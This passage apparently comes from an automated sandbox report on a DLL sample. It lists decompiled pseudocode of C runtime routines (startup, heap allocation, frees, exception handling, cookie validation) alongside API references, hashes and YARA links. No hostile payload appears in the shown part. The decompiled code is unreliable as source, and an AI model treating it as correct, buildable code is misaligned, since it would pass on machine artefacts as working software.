										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6EDA3761(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E6EDA2A70( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E6EDA2A70( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6EDA3A76( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6EDA3761(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6EDA3A76( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6edc3870 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6EDA3DCE(1, _t90, 1, _t113);
								E6EDA3C8A();
								E6EDA40EC();
								 *0x6edc3bb0 =  *0x6edc3bb0 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6EDA3950();
								_t67 = E6EDA3F6F( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6EDA395D();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6edc3bb0 = 1;
						if(E6EDA3D60(_t132) != 0) {
							E6EDA3C7E(E6EDA40C0());
							E6EDA3CA2();
							_t80 = E6EDA5347(0x6edae114, 0x6edae124);
							_pop(_t102);
							if(_t80 == 0 && E6EDA3D35(1, _t102) != 0) {
								E6EDA5300(_t102, 0x6edae108, 0x6edae110);
								 *0x6edc3bb0 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6EDA3897();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6EDA3F97();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6EDA3EBE(_t85, _t106, _t121, _t138) != 0) {
									 *0x6edae104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6edc3870 =  *0x6edc3870 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 6EDA3801

Part of subcall function 6EDA3C7E: InitializeSListHead.KERNEL32(6EDC3B98,6EDA380B,6EDC13D8,00000010,6EDA379C,?,?,?,6EDA39C4,?,00000001,?,?,00000001,?,6EDC1420), ref: 6EDA3C83

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EDA386B

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: f4bf99fd76a75b942ce1e27152ba0417ab960f5bf9d7eed0ab2d888bf6395e19
Instruction ID: ea166d25d5f8c3b16b471f89d42d79e255e71077c764db91957e62c4bc463ee5
Opcode Fuzzy Hash: f4bf99fd76a75b942ce1e27152ba0417ab960f5bf9d7eed0ab2d888bf6395e19
Instruction Fuzzy Hash: AC21D131948242DADB006BFCD81D3DC37679F0666CF100859EB416F2C1CB629349C676

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5A9C, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA5A9C(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6eda5aa1

APIs

Part of subcall function 6EDA7F29: GetEnvironmentStringsW.KERNEL32 ref: 6EDA7F32
Part of subcall function 6EDA7F29: _free.LIBCMT ref: 6EDA7F91
Part of subcall function 6EDA7F29: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EDA7FA0

_free.LIBCMT ref: 6EDA5ADC
_free.LIBCMT ref: 6EDA5AE3

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 8460bbe5cb118659679e1691a821a94165189f102992640d2c7722e1f692038e
Instruction ID: 7ccb58c66a8cf176fd497b08ee2f41edc0fc4a2249475a2b79a93996be26624d
Opcode Fuzzy Hash: 8460bbe5cb118659679e1691a821a94165189f102992640d2c7722e1f692038e
Instruction Fuzzy Hash: 56E0EC13A0551199A2515FFFEC4458E31185B42778B250656EA20C71C0DB60D70201E1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA9F5D, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E6EDA9F5D(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E6EDA6AE6(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E6EDA8502(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E6EDA6B43(0);
				return _t35;
			}

0x6eda9f63
0x6eda9f6a
0x6eda9f6f
0x6eda9f73
0x6eda9f7a
0x6eda9f80
0x6eda9f80
0x6eda9f86
0x6eda9f88
0x6eda9f8b
0x6eda9f8b
0x6eda9f8e
0x6eda9f90
0x6eda9f96
0x6eda9f9a
0x6eda9f9f
0x6eda9fa3
0x6eda9fa5
0x6eda9fa8
0x6eda9fae
0x6eda9fb5
0x6eda9fb9
0x6eda9fbd
0x6eda9fc0
0x6eda9fc3
0x6eda9fc3
0x6eda9fc7
0x6eda9fca
0x6eda9f7c
0x6eda9f7c
0x6eda9f7c
0x6eda9fcc
0x6eda9fd9

APIs

Part of subcall function 6EDA6AE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EDA66E5,00000001,00000364,00000007,000000FF,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA6B27

_free.LIBCMT ref: 6EDA9FCC

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 2bcc8b6353cd1c71f4f318913fe7f205d0146c5ce45364e0147c08b43b6dbee7
Instruction ID: ac5bfdd4e27e47037658c97ee9522ac001bbdecc32cce4939c5080a742235bce
Opcode Fuzzy Hash: 2bcc8b6353cd1c71f4f318913fe7f205d0146c5ce45364e0147c08b43b6dbee7
Instruction Fuzzy Hash: 0E012B726043569FC3208F9DD8859CEFB9CEB05370F050669EA58A76C0E7709A10C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6AE6, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA6AE6(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6edc4230, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6EDA950C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6EDA6AD3(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6EDA86FF(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EDA66E5,00000001,00000364,00000007,000000FF,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA6B27

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 445844bfc0f7372bd1dff77d2c6b0ade16b16d5ddc05930fbddc02473512c3c4
Instruction ID: eeba089cab2de7083df7726299e5e29430195d5ec92df413d8517da957bdcee7
Opcode Fuzzy Hash: 445844bfc0f7372bd1dff77d2c6b0ade16b16d5ddc05930fbddc02473512c3c4
Instruction Fuzzy Hash: F2F0BE32625626EABB515FEED815B8F775CEF42B60B009021AE34AA0C4CB70DB0187F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EDA3F9D, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDA3F9D(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6EDA40B8(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6EDA4690(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6EDA4690(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6EDA40B8(_t49);
				}
				return _t49;
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EDA3FA9
IsDebuggerPresent.KERNEL32 ref: 6EDA4075
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EDA4095
UnhandledExceptionFilter.KERNEL32(?), ref: 6EDA409F

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: fbd2c4b455aa0dc532f671b597d0d6d96551d7df6cfac7fef1b617851bf98534
Instruction ID: 0002daaae3943d165f8c48d6965b842aa8e6e0c44be6a155eead4d0d29a8ccb8
Opcode Fuzzy Hash: fbd2c4b455aa0dc532f671b597d0d6d96551d7df6cfac7fef1b617851bf98534
Instruction Fuzzy Hash: F8311A75D45218DBDF10DFA8D9897CDBBF8AF04304F10409AE508AB250EB719B86DF59

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA91F7, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA91F7(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6edc36f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6EDA6B43(_t46);
							E6EDAB129( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6EDA6B43(_t47);
							E6EDAB227( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6EDA6B43( *((intOrPtr*)(_t74 + 0x7c)));
						E6EDA6B43( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6EDA6B43( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6EDA936A( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6edc3640) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6EDA6B43(_t31);
							E6EDA6B43( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe87
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6EDA6B43(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6EDA6B43(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6EDA923B

Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB146
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB158
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB16A
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB17C
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB18E
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1A0
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1B2
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1C4
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1D6
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1E8
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB1FA
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB20C
Part of subcall function 6EDAB129: _free.LIBCMT ref: 6EDAB21E

_free.LIBCMT ref: 6EDA9230

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDA9252
_free.LIBCMT ref: 6EDA9267
_free.LIBCMT ref: 6EDA9272
_free.LIBCMT ref: 6EDA9294
_free.LIBCMT ref: 6EDA92A7
_free.LIBCMT ref: 6EDA92B5
_free.LIBCMT ref: 6EDA92C0
_free.LIBCMT ref: 6EDA92F8
_free.LIBCMT ref: 6EDA92FF
_free.LIBCMT ref: 6EDA931C
_free.LIBCMT ref: 6EDA9334

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f2ed30e41ee3401bf1e6fe1dfb64ced4573905232f5de71896af971dbe39bb73
Instruction ID: fee70203a665c3eb1005dd9ba4b2ea0f1fac787a8aa29ccc052f19b358f811a7
Opcode Fuzzy Hash: f2ed30e41ee3401bf1e6fe1dfb64ced4573905232f5de71896af971dbe39bb73
Instruction Fuzzy Hash: 5A315E31514305DFEB508BBEE944B9AB3E9EF01354F544929E669D7190EB32EB408720

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA63FD, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EDA63FD(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6edaec18;
				if(_t68 != 0x6edaec18) {
					E6EDA6B43(_t68);
					_t36 = _a4;
				}
				E6EDA6B43( *((intOrPtr*)(_t36 + 0x3c)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x30)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x34)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x38)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x28)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x2c)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x40)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x44)));
				E6EDA6B43( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6EDA6245(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6EDA62A6(_t67, _t72, _t73, _t77);
			}

APIs

_free.LIBCMT ref: 6EDA6413

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDA641F
_free.LIBCMT ref: 6EDA642A
_free.LIBCMT ref: 6EDA6435
_free.LIBCMT ref: 6EDA6440
_free.LIBCMT ref: 6EDA644B
_free.LIBCMT ref: 6EDA6456
_free.LIBCMT ref: 6EDA6461
_free.LIBCMT ref: 6EDA646C
_free.LIBCMT ref: 6EDA647A

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4e40cbe883cb4878703dd689a6c407913b60ba4018aba69a585cb100f9b2e910
Instruction ID: c04a3ed86093093d071a1f9eb81a637bbd1a942660d79ab9b7498959fd49eb9e
Opcode Fuzzy Hash: 4e40cbe883cb4878703dd689a6c407913b60ba4018aba69a585cb100f9b2e910
Instruction Fuzzy Hash: DA21C77692410CEFCB41DFDDC884DDEBBB9EF08300B0445A6A6259B160EB71EB448B90

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA43B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6EDA43B0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t110;

				_t87 = __edx;
				_push(__ebx);
				_t73 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t73 = E6EDAD610(__ecx,  *_t73);
				_t74 = _a8;
				_t6 = _t74 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t74 + 8) ^  *0x6edc3004;
				E6EDA4370(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x6edc3004);
				E6EDA4957(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t91 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E6EDA4940(_t74, 0xfffffffe, _t94, 0x6edc3004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t60 = _t91 + (_t91 + 2) * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
							_t61 = _t78 + _t60 * 4;
							_t79 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t62 = E6EDA48E0(_t79, _t94);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E6EDA4370(_t74, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x6edae15c;
											if(__eflags != 0) {
												_t69 = E6EDAD4B0(__eflags, 0x6edae15c);
												_t103 = _t103 + 4;
												__eflags = _t69;
												if(_t69 != 0) {
													_t98 =  *0x6edae15c; // 0x6eda4585
													 *0x6edae104(_a4, 1);
													 *_t98();
													_t94 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t88 = _t63;
										E6EDA4920(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
											_t88 = _t91;
											E6EDA4940(_t65, _t91, _t94, 0x6edc3004);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
										_t66 = E6EDA4370(_t74, _t88, _t91, _t94, _v12);
										E6EDA4900();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t99, _t94);
										__eflags = _t66;
										if(_t66 != 0) {
											_push(_t94);
											do {
												_t96 =  *_t66;
												E6EDA5FD1(_t66);
												_t66 = _t96;
												__eflags = _t96;
											} while (_t96 != 0);
											return _t66;
										}
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t91 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6EDA43E7
___except_validate_context_record.LIBVCRUNTIME ref: 6EDA43EF
_ValidateLocalCookies.LIBCMT ref: 6EDA4478
__IsNonwritableInCurrentImage.LIBCMT ref: 6EDA44A3
_ValidateLocalCookies.LIBCMT ref: 6EDA44F8

Strings

csm, xrefs: 6EDA448D

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 43d498b883869f491b085736dd0c27f921ff88a98f7f9083e81042c05d651716
